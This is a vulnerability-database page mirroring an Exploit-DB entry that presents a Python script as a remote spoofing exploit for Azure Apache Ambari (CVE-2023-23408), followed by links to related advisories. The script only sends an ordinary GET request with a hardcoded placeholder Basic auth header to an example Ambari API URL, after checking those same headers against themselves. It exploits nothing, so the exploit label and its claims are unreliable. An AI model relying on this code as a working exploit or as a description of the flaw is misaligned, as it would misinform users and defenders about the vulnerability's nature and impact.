Lucene search
Amirhossein BahramizadehEDB-ID:51546HistoryJun 26, 2023 - 12:00 a.m.
Azure Apache Ambari 2302250400 - Spoofing
2023-06-2600:00:00
Amirhossein Bahramizadeh
www.exploit-db.com
96
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
Microsoft
Apache Ambari
Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408
import requests
# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
# Define a function to validate the headers
def validate_headers(headers):
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
return False
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
return False
return True
# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
if not validate_headers(headers):
print("Invalid headers")
return
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Call the send_request function with the URL and headers
send_request(url, headers)Related
prion
prion
Spoofing
2023-03-14 17:15:00
mscve
mscve
Azure Apache Ambari Spoofing Vulnerability
2023-03-14 07:00:00
cve
cve
CVE-2023-23408
2023-03-14 17:15:14
zdt
zdt
Azure Apache Ambari 2302250400 - Spoofing Exploit
2023-06-26 00:00:00
packetstorm
packetstorm
Azure Apache Ambari 2302250400 Spoofing
2023-06-27 00:00:00
cvelist
cvelist
CVE-2023-23408 Azure Apache Ambari Spoofing Vulnerability
2023-03-14 16:55:39
kaspersky
kaspersky
KLA48559 Multiple vulnerabilities in Microsoft Azure
2023-03-14 00:00:00
rapid7blog
rapid7blog
Patch Tuesday - March 2023
2023-03-14 23:46:44